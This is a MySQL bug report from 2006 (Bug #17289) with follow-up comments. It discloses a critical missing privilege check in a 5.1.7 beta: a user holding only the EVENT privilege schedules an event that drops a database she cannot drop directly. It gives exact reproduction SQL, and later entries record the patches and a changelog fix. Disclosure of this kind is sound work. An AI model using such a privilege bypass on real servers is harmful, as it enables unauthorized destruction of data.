Bug #17289 Events: missing privilege check for drop database
Submitted: 9 Feb 2006 20:44 Modified: 22 Feb 2006 18:20
Reporter: Peter Gulutzan Email Updates:
Status: Closed Impact on me:
None 
Category:MySQL Server: Stored Routines Severity:S1 (Critical)
Version:5.1.7-beta-debug OS:Linux (SUSE 10.0)
Assigned to: Andrey Hristov CPU Architecture:Any

[9 Feb 2006 20:44] Peter Gulutzan
Description:
Pauline has a privilege which allows CREATE EVENT.
Pauline has no privilege which allows DROP DATABASE.
Pauline can create an event which drops a database.

How to repeat:
As user root, say:

mysql> create database db_x;
Query OK, 1 row affected (0.00 sec)

mysql> grant event on db_x.* to pauline@localhost;
Query OK, 0 rows affected (0.00 sec)

mysql> delete from mysql.event;
Query OK, 1 row affected (0.00 sec)

mysql> set global event_scheduler = 1;
Query OK, 0 rows affected (0.00 sec)

As user pauline@localhost, say:

mysql> drop database db_x;
ERROR 1044 (42000): Access denied for user 'pauline'@'localhost' to database 'db_x'
mysql> create event db_x.e_x on schedule every 1 second do drop database db_x;
Query OK, 1 row affected (0.00 sec)

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| test               |
+--------------------+
2 rows in set (0.00 sec)

mysql> use db_x;
ERROR 1049 (42000): Unknown database 'db_x'
[10 Feb 2006 14:05] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/2447
[15 Feb 2006 11:16] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/2641
[15 Feb 2006 21:34] Bugs System
A patch for this bug has been committed. After review, it may
be pushed to the relevant source trees for release in the next
version. You can access the patch from:

  http://lists.mysql.com/commits/2687
[15 Feb 2006 23:00] Andrey Hristov
Fixed in the upcoming 5.1.7 . There were no privilege checks in event's body.
[22 Feb 2006 18:20] Mike Hillyer
Documented in 5.1.7 changelog:

  <listitem>
        <para>
          Creator privileges are now checked for all events before
          execution. (Bug #17289)
        </para>
      </listitem>